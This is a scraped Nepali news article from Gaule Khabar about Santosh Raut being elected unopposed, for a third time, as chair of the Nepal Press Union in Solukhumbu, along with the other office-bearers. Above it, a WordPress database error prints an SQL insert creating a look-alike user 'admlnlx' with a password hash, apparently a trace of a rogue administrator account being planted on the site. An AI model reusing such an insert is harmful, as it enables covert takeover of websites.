WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BtWRHyb0dXJuFixhAmIgu50aSMoTjI.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 04:21:55', '', 'admlnlx', 'admlnlx')

नेपाल प्रेस यूनियन सोलुखुम्बुको अध्यक्षमा सर्बसमत तेस्रोपटक सन्तोष राउत – Gaule Khabar

नेपाल प्रेस यूनियन सोलुखुम्बुको अध्यक्षमा सर्बसमत तेस्रोपटक सन्तोष राउत

नेपाल प्रेस यूनियन सोलुखुम्बुको अध्यक्षमा सर्बसमत तेस्रोपटक सन्तोष राउत

गाउँले न्युज, सोलुखुम्बु । नेपाल प्रेस यूनियन सोलुखुम्बुको अध्यक्षमा सन्तोष राउत तेस्रो पटक चयन भएका छन् । सोमबार सल्लेरीमा भएको तेस्रो जिल्ला अबिधेशनबाट राउत अध्यक्षमा सर्वसम्मत चयन भएका हुन् ।
यूनियनको उपाध्यक्षमा शिखर जंग श्रेष्ठ र विना राई, सचिबमा अम्रित थुलुङ, कोषाध्यक्षमा अम्रिता राई र सह–सचिबमा सोनि राई चयन भएका छन् । १५ सदस्सीय समितिको सदस्यहरुमा ललित कार्की, दिपेन्द्र पराजुली, धन कुमार ढुंगेल, निशा राई, सलिना लामिछाने, प्रविण राई, सोनामछोटी शेर्पा, होमनाथ खत्री र अर्जुन कुमार राईलाई चयन गरिएको छ ।

अबिधेशनले प्रदेश र केन्द्रीय प्रतिनिधि समेत छनौट गरेको छ । केन्द्रीय प्रतिनिधिहरुमा अध्यक्ष राउत सहित भानुभक्त निरौला, ललित कार्की, अम्रित राई, विना राई, अम्रिता राई र सरस्वती बस्नेत छनौट भएका छन् भने प्रदेश प्रतिनिधिमा शिखर जंग श्रेष्ठ, अशोक राई, धन कुमार ढुंगेल, उद्धव कुलुङ, अनुजा कटेल, सविता राउत, निशा श्रेष्ठ र निशा राई चयन भएका छन् ।

प्रेस यूनियनमा जिल्लाका ३३ जना पत्रकार आबद्ध रहेका छन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका